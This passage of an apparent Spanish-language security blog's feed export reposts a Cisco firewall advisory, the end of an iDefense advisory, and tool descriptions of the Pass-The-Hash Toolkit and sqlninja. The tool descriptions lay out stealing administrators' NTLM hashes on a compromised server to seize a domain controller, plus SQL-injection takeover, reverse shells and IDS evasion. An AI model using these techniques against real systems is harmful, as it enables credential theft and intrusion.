/&gt;This vulnerability was reported to VeriSign iDefense by regenrecht.&lt;br /&gt;&lt;br /&gt;Get paid for vulnerability research&lt;br /&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;br /&gt;&lt;br /&gt;Free tools, research and upcoming events&lt;br /&gt;http://labs.idefense.com/&lt;br /&gt;X. LEGAL NOTICES&lt;br /&gt;&lt;br /&gt;Copyright � 2008 iDefense, Inc.&lt;br /&gt;&lt;br /&gt;Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.&lt;br /&gt;&lt;br /&gt;Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-5582484132890417882?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/5582484132890417882/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=5582484132890417882' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5582484132890417882'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5582484132890417882'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/multiple-vendor-x-server-xfree86-misc.html' title='Multiple Vendor X Server XFree86-Misc Extension Invalid Array Index Vulnerability'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-8749095768527401506</id><published>2008-02-08T06:27:00.000-08:00</published><updated>2008-02-08T06:28:03.853-08:00</updated><title type='text'>Cisco PIX and ASA Time-to-Live Vulnerability</title><content type='html'>Cisco Security Advisory: Cisco PIX and ASA Time-to-Live Vulnerability&lt;br /&gt;Document ID: 100314&lt;br /&gt;Advisory ID: cisco-sa-20080123-asa&lt;br /&gt;http://www.cisco.com/warp/public/707/cisco-sa-20080123-asa.shtml&lt;br /&gt;Revision 1.0&lt;br /&gt;For Public Release 2008 January 23 1600 UTC (GMT)&lt;br /&gt;Please provide your feedback on this document.&lt;br /&gt;Contents&lt;br /&gt;&lt;br /&gt;    Summary&lt;br /&gt;    Affected Products&lt;br /&gt;    Details&lt;br /&gt;    Vulnerability Scoring Details&lt;br /&gt;    Impact&lt;br /&gt;    Software Versions and Fixes&lt;br /&gt;    Workarounds&lt;br /&gt;    Obtaining Fixed Software&lt;br /&gt;    Exploitation and Public Announcements&lt;br /&gt;    Status of this Notice: Final&lt;br /&gt;    Distribution&lt;br /&gt;    Revision History&lt;br /&gt;    Cisco Security Procedures&lt;br /&gt;&lt;br /&gt;Summary&lt;br /&gt;&lt;br /&gt;A crafted IP packet vulnerability exists in the Cisco PIX 500 Series Security Appliance (PIX) and the Cisco 5500 Series Adaptive Security Appliance (ASA) that may result in a reload of the device. This vulnerability is triggered during processing of a crafted IP packet when the Time-to-Live (TTL) decrement feature is enabled.&lt;br /&gt;&lt;br /&gt;Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0028 has been assigned to this vulnerability.&lt;br /&gt;&lt;br /&gt;Cisco has released free software updates that address this vulnerability. A workaround that mitigates this vulnerability is available.&lt;br /&gt;&lt;br /&gt;This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080123-asa.shtml.&lt;br /&gt;[Expand all sections]     [Collapse all sections]&lt;br /&gt;Affected Products&lt;br /&gt;Vulnerable Products&lt;br /&gt;&lt;br /&gt;The TTL decrement feature was introduced in version 7.2(2) and it is disabled by default. The Cisco PIX and ASA security appliances running software versions prior to 7.2(3)006 or 8.0(3) and that have the TTL decrement feature enabled are vulnerable.&lt;br /&gt;&lt;br /&gt;By default the PIX and ASA security appliance software does not decrement the TTL of transient packets. The ability to decrement the TTL of transient packets can be enabled on a selective or global basis by using the set connection decrement-ttl command in the policy-map class configuration mode. To determine whether you are running this feature use the show running-config command and search for the set connection decrement-ttl command. Alternatively you can use the include argument to search for this command as follows:&lt;br /&gt;&lt;br /&gt;    ASA#show running-config  |  include decrement-ttl&lt;br /&gt;    set connection decrement-ttl&lt;br /&gt;    ASA#&lt;br /&gt;&lt;br /&gt;The set connection decrement-ttl command is part of a configured class-map. In order for this command to take effect it must be applied using a policy-map (assigned globally or to an interface). For more information about the Modular Policy Framework on the Cisco ASA and PIX refer to the following link: http://www.cisco.com/en/US/docs/security/asa/asa80/configuration/guide/mpc.html&lt;br /&gt;&lt;br /&gt;To determine whether you are running a vulnerable version of Cisco PIX or ASA software, issue the show version command-line interface (CLI) command. The following example shows a Cisco ASA Security Appliance that runs software release 7.2(3):&lt;br /&gt;&lt;br /&gt;    ASA#show version&lt;br /&gt;                                                                                    &lt;br /&gt;    Cisco Adaptive Security Appliance Software Version 7.2(3)                       &lt;br /&gt;                                                                                        &lt;br /&gt;    [...]&lt;br /&gt;&lt;br /&gt;Customers who use the Cisco Adaptive Security Device Manager (ASDM) to manage their devices can find the version of the software displayed in the table in the login window or in the upper left corner of the ASDM window. The version notation is similar to the following:&lt;br /&gt;&lt;br /&gt;    PIX Version 7.2(3)&lt;br /&gt;&lt;br /&gt;Products Confirmed Not Vulnerable&lt;br /&gt;&lt;br /&gt;Cisco PIX and ASA security appliances which do not support the TTL decrement feature or are not explicitly configured for it are not vulnerable.&lt;br /&gt;&lt;br /&gt;Note: The TTL decrement feature was introduced in version 7.2(2), and it is disabled by default. The Cisco Firewall Services Module (FWSM) is not vulnerable.&lt;br /&gt;&lt;br /&gt;No other Cisco products are currently known to be affected by this vulnerability.&lt;br /&gt;Top of the section      Close Section&lt;br /&gt;Details&lt;br /&gt;&lt;br /&gt;A crafted IP packet vulnerability exists in the Cisco PIX 500 Series Security Appliance (PIX) and the Cisco 5500 Series Adaptive Security Appliance (ASA) that may result in a reload of the device. This vulnerability is triggered during processing of a crafted IP packet when the Time-to-Live (TTL) decrement feature is enabled. This vulnerability is documented in Cisco Bug ID CSCsk48199 ( registered customers only) .&lt;br /&gt;Top of the section      Close Section&lt;br /&gt;Vulnerability Scoring Details&lt;br /&gt;&lt;br /&gt;Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.&lt;br /&gt;&lt;br /&gt;CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.&lt;br /&gt;&lt;br /&gt;Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.&lt;br /&gt;&lt;br /&gt;Cisco has provided an FAQ to answer additional questions regarding CVSS at&lt;br /&gt;&lt;br /&gt;http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html .&lt;br /&gt;&lt;br /&gt;Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at&lt;br /&gt;&lt;br /&gt;http://intellishield.cisco.com/security/alertmanager/cvss .&lt;br /&gt;&lt;br /&gt;CSCsk48199 - Cisco PIX and ASA TTL Vulnerability&lt;br /&gt;&lt;br /&gt;Calculate the environmental score of CSCsk48199&lt;br /&gt;&lt;br /&gt;CVSS Base Score - 7.8&lt;br /&gt;&lt;br /&gt;Access Vector&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Access Complexity&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Authentication&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Confidentiality Impact&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Integrity Impact&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Availability Impact&lt;br /&gt;&lt;br /&gt;Network&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Low&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;None&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;None&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;None&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Complete&lt;br /&gt;&lt;br /&gt;CVSS Temporal Score - 6.4&lt;br /&gt;&lt;br /&gt;Exploitability&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Remediation Level&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Report Confidence&lt;br /&gt;&lt;br /&gt;Functional&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Official-Fix&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Confirmed&lt;br /&gt;&lt;br /&gt;Top of the section      Close Section&lt;br /&gt;Impact&lt;br /&gt;&lt;br /&gt;Successful exploitation of the vulnerability described in this advisory will result in a reload of the affected device. Repeated exploitation can result in a sustained denial of service (DoS) condition.&lt;br /&gt;Top of the section      Close Section&lt;br /&gt;Software Versions and Fixes&lt;br /&gt;&lt;br /&gt;This vulnerability is fixed in software version 7.2(3)6 or 8.0(3) and later.&lt;br /&gt;&lt;br /&gt;When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.&lt;br /&gt;&lt;br /&gt;In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.&lt;br /&gt;Top of the section      Close Section&lt;br /&gt;Workarounds&lt;br /&gt;&lt;br /&gt;Disable the TTL decrement feature using the no set connection decrement-ttl command in class configuration mode.&lt;br /&gt;&lt;br /&gt;    ASA(config)#policy-map localpolicy1&lt;br /&gt;    ASA(config-pmap)#class local_server&lt;br /&gt;    ASA(config-pmap-c)#no set connection decrement-ttl&lt;br /&gt;    ASA(config-pmap-c)#exit&lt;br /&gt;&lt;br /&gt;For additional information on identifying and mitigating TTL based attacks, please refer to the Cisco Applied Intelligence White Paper "TTL Expiry Attack Identification and Mitigation", available at: http://cisco.com/web/about/security/intelligence/ttl-expiry.html.&lt;br /&gt;Top of the section      Close Section&lt;br /&gt;Obtaining Fixed Software&lt;br /&gt;&lt;br /&gt;Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.&lt;br /&gt;&lt;br /&gt;Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html , or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml .&lt;br /&gt;&lt;br /&gt;Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.&lt;br /&gt;Customers with Service Contracts&lt;br /&gt;&lt;br /&gt;Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.&lt;br /&gt;Customers using Third Party Support Organizations&lt;br /&gt;&lt;br /&gt;Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.&lt;br /&gt;&lt;br /&gt;The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.&lt;br /&gt;Customers without Service Contracts&lt;br /&gt;&lt;br /&gt;Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.&lt;br /&gt;&lt;br /&gt;    * +1 800 553 2447 (toll free from within North America)&lt;br /&gt;    * +1 408 526 7209 (toll call from anywhere in the world)&lt;br /&gt;    * e-mail: tac@cisco.com&lt;br /&gt;&lt;br /&gt;Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.&lt;br /&gt;&lt;br /&gt;Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.&lt;br /&gt;Top of the section      Close Section&lt;br /&gt;Exploitation and Public Announcements&lt;br /&gt;&lt;br /&gt;The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory.&lt;br /&gt;Top of the section      Close Section&lt;br /&gt;Status of this Notice: Final&lt;br /&gt;&lt;br /&gt;THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.&lt;br /&gt;&lt;br /&gt;A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.&lt;br /&gt;Top of the section      Close Section&lt;br /&gt;Distribution&lt;br /&gt;&lt;br /&gt;This advisory is posted on Cisco's worldwide website at :&lt;br /&gt;&lt;br /&gt;http://www.cisco.com/warp/public/707/cisco-sa-20080123-asa.shtml&lt;br /&gt;&lt;br /&gt;In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.&lt;br /&gt;&lt;br /&gt;    * cust-security-announce@cisco.com&lt;br /&gt;    * first-teams@first.org&lt;br /&gt;    * bugtraq@securityfocus.com&lt;br /&gt;    * vulnwatch@vulnwatch.org&lt;br /&gt;    * cisco@spot.colorado.edu&lt;br /&gt;    * cisco-nsp@puck.nether.net&lt;br /&gt;    * full-disclosure@lists.grok.org.uk&lt;br /&gt;    * comp.dcom.sys.cisco@newsgate.cisco.com&lt;br /&gt;&lt;br /&gt;Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.&lt;br /&gt;Top of the section      Close Section&lt;br /&gt;Revision History&lt;br /&gt;&lt;br /&gt;Revision 1.0&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;2008-January-23&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Initial public release&lt;br /&gt;&lt;br /&gt;Top of the section      Close Section&lt;br /&gt;Cisco Security Procedures&lt;br /&gt;&lt;br /&gt;Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.&lt;br /&gt;Top of the section      Close Section&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-8749095768527401506?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/8749095768527401506/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=8749095768527401506' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8749095768527401506'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8749095768527401506'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/cisco-pix-and-asa-time-to-live.html' title='Cisco PIX and ASA Time-to-Live Vulnerability'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-5590581382076892024</id><published>2008-02-08T06:24:00.000-08:00</published><updated>2008-02-08T06:25:26.738-08:00</updated><title type='text'>Pass-The-Hash Toolkit</title><content type='html'>Tomado de: http://oss.coresecurity.com/projects/pshtoolkit.htm&lt;br /&gt;&lt;br /&gt;What is Pass-The-Hash Toolkit?&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!).&lt;br /&gt;&lt;br /&gt;Utilities in the toolkit:&lt;br /&gt;&lt;br /&gt;    * IAM.EXE: Pass-The-Hash for Windows. This tool allows you to change your current NTLM credentials withouth having the cleartext password but the hashes of the password. The program receives a username, domain name and the LM and NT hashes of the password; using this it will change in memory the NTLM credentials associated with the current windows logon session. After the program performs this operation, all outbound network connections to services that use for authentication the NTLM credentials of the currently logged on user will utilize the credentials modified by IAM.EXE. This includes 'net use', 'net view', many third-party DCOM services that use NTLM authentication, etc. This is basically 'pass-the-hash' for windows; one of the main advantages is that you don't need to use a modified version of samba or samba-tng and be restricted to the limited functionality they implement, you can now use windows and any third-party software with stolen hashes withouth having to obtain the cleartext version of a password. For more information take a look at this paper I wrote back in 2000 Modifying Windows NT Logon Credentials.&lt;br /&gt;&lt;br /&gt;    * WHOSTHERE.EXE: This tool will list logon sessions with NTLM credentials (username,domain name, LM and NT hashes). Logon sessions are created by windows services that log in using specific users, remote desktop connections, etc. This tool has many uses, one that i think is interesting: Let's say you compromised a Windows Server that is part of a Windows Domain (e.g.: Backup server) but is NOT the domain controller. Since it is not the domain controller, you only have access to the local SAM and although you did effectively comprise a sensitive server you did not compromise the domain. However, it is very common in such situations to find that administrators are using Remote Desktop to connect to the compromised server to perform different tasks. So this is your chance, just wait for the administrator to log into the compromised server using remote desktop, at that point, run 'WHOSTHERE.EXE' and you will observe the administrators username,domain name, and NTLM hashes. Now go to your machine, use them with IAM.EXE and compromise the domain controller using the administrator's credentials.&lt;br /&gt;&lt;br /&gt;    * GENHASH.EXE: This is a small utility that generates LM and NT hashes using some 'undocumented' functions of the Windows API. This is a small tool to aid testing of IAM.EXE.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      Source Code&lt;br /&gt;          o Latest stable release (1.2), updated on January 21, 2008. gzip'd tarball.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;        Win32 binaries&lt;br /&gt;          o Latest stable release (1.2), updated on January 21, 2008. gzip'd tarball&lt;br /&gt;&lt;br /&gt;      Setup&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      Quick start:There's not much to be done, extract the .tgz file and have fun!.&lt;br /&gt;&lt;br /&gt;      Requirements&lt;br /&gt;          o You can compile the tools using Microsoft Visual C++ 2005 Express Edition (available at http://msdn.microsoft.com/vstudio/express/). Minor modifications might be needed to compile them using other C compilers.&lt;br /&gt;          o You must have Administrator privileges to run these tools (except for genhash.exe).&lt;br /&gt;          o IAM.EXE was mostly tested on WinXP and Windows Server 2003, although it should also work on Vista. WHOSTHERE.EXE now works correctly on Windows Server 2003. Support for Vista will be added.&lt;br /&gt;&lt;br /&gt;      Documentation&lt;br /&gt;&lt;br /&gt;      Click the following link for an online copy of the documentation. This page contains instructions on how to use the tools.&lt;br /&gt;&lt;br /&gt;       &lt;br /&gt;      Known issues&lt;br /&gt;&lt;br /&gt;      This version contains modifications that make it work better in Windows Server 2003 and in German and French versions of WinXPSP2, checkout the WHATSNEW file. If you have any problems please let me know!.&lt;br /&gt;&lt;br /&gt;       &lt;br /&gt;      Licensing&lt;br /&gt;&lt;br /&gt;      This software is provided under the following license for non-commercial use.&lt;br /&gt;&lt;br /&gt;       &lt;br /&gt;      Contact Us&lt;br /&gt;&lt;br /&gt;      Whether you want to report a bug, send a patch or give some suggestions on this package, drop us a few lines at oss@coresecurity.com . To contact me, the author, you can reach me at hochoa[ a t ]coresecurity.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-5590581382076892024?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/5590581382076892024/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=5590581382076892024' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5590581382076892024'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5590581382076892024'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/pass-hash-toolkit.html' title='Pass-The-Hash Toolkit'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-8663537290841198363</id><published>2008-02-08T06:20:00.000-08:00</published><updated>2008-02-08T06:21:18.273-08:00</updated><title type='text'>SQL Ninja! ...a SQL Server injection &amp; takeover tool</title><content type='html'>Tomado de: http://sqlninja.sourceforge.net/&lt;br /&gt;&lt;br /&gt;Introduction&lt;br /&gt;&lt;br /&gt;Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.&lt;br /&gt;Its main goal is to provide a remote shell on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.&lt;br /&gt;It is released under the GPLv2 and it has been featured on SecurityHack's Top 15 Free SQL Injection Scanners, which is a good result for something that started as a small script written on-the-fly during a pen-test :)&lt;br /&gt;Features&lt;br /&gt;&lt;br /&gt;The full documentation can be found in the tarball and also here, but here's a list of what the Ninja does:&lt;br /&gt;&lt;br /&gt;    * Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)&lt;br /&gt;    * Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)&lt;br /&gt;    * Privilege escalation to sysadmin group if 'sa' password has been found&lt;br /&gt;    * Creation of a custom xp_cmdshell if the original one has been removed&lt;br /&gt;    * Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)&lt;br /&gt;    * TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell&lt;br /&gt;    * Direct and reverse bindshell, both TCP and UDP&lt;br /&gt;    * DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works) &lt;br /&gt;    * Evasion techniques to confuse a few IDS/IPS/WAF&lt;br /&gt;&lt;br /&gt;Platforms supported&lt;br /&gt;&lt;br /&gt;Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:&lt;br /&gt;&lt;br /&gt;    * Linux&lt;br /&gt;    * FreeBSD&lt;br /&gt;    * Mac OS X&lt;br /&gt;&lt;br /&gt;Sqlninja does not run on Windows and I am not planning a port in the near future&lt;br /&gt;Author&lt;br /&gt;&lt;br /&gt;icesurfer - r00t .at. northernfortress .dot. net&lt;br /&gt;PGP ID: 0x2DFF3D59&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-8663537290841198363?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/8663537290841198363/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=8663537290841198363' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8663537290841198363'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8663537290841198363'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/sql-ninja-sql-server-injection-takeover.html' title='SQL Ninja! ...a SQL Server injection &amp; takeover tool'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-4805628477658897723</id><published>2008-02-08T06:13:00.000-08:00</published><updated>2008-02-08T06:20:16.602-08:00</updated><title type='text'>Try To Defeat ME!</title><content type='html'>Bueno mis plegarias han sido escuchadas he recibido patrocinio y seguire con el BLog&lt;br /&gt;desde mi Portatil Dell Vostro 1000 Desde el cual es lo suficientemente modesto para escribir en este blog... &lt;br /&gt;Ahora &lt;br /&gt;Necesito Un Patrocinador PARA UNA MAQUINA SUN tipo pc X86 o 64bits&lt;br /&gt;Con 2 Gigas de Ram para Hacer Pruebas Por virtualización&lt;br /&gt;y seguir aportando cosas interesantes.....&lt;br /&gt;y Alguien que me patrocine para tener internet ya que no tengo en casa....&lt;br /&gt;Recuerden&lt;br /&gt;Telefonos en Colombia&lt;br /&gt;574 4222366&lt;br /&gt;57 3012958610&lt;br /&gt;Hasta Pronto&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-4805628477658897723?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/4805628477658897723/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=4805628477658897723' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4805628477658897723'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4805628477658897723'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/try-to-defeat-me.html' title='Try To Defeat ME!'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-2263671449995962339</id><published>2008-01-12T00:28:00.000-08:00</published><updated>2008-01-12T00:33:39.152-08:00</updated><title type='text'>Si desean que regrese...</title><content type='html'>Los siento amigos.... llevo meses sin postear mi vida ahora esta mal economicamente y por ende con problemas algunas personas me han contactado para preguntarme sobre el blog y mis entradas... pero igual no me hablan de Dinero Oportunidades o Posibilidades... y por ende si no hay dinero no puedo sacar tiempo....&lt;br /&gt;&lt;br /&gt;Lo siento mis sinceras disculpas-------&lt;br /&gt;&lt;br /&gt;Si desean que ponga en marcha mis proyectos de Asterisk trucos de PHP Perfilamientos y refuerzo de seguridad en linux consejos de Pen Testing y actualidad&lt;br /&gt;&lt;br /&gt;Contacteme y hableme quiza pueda encontrar en mi el talento que busca....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-2263671449995962339?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/2263671449995962339/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=2263671449995962339' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/2263671449995962339'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/2263671449995962339'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/01/si-desean-que-regrese.html' title='Si desean que regrese...'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-8778460237986132452</id><published>2007-09-28T16:27:00.000-07:00</published><updated>2007-09-28T16:40:24.275-07:00</updated><title type='text'>Office Communications Server &amp; Asterisk</title><content type='html'>&lt;p&gt;Search google with "sip pstn site:www.microsoft.com asterisk" &lt;br /&gt;You will find out how to configure LCS static routing to SIP Gateway, &lt;br /&gt;like Asterisk &lt;br /&gt;but you need patch Asterisk to support TCP. &lt;br 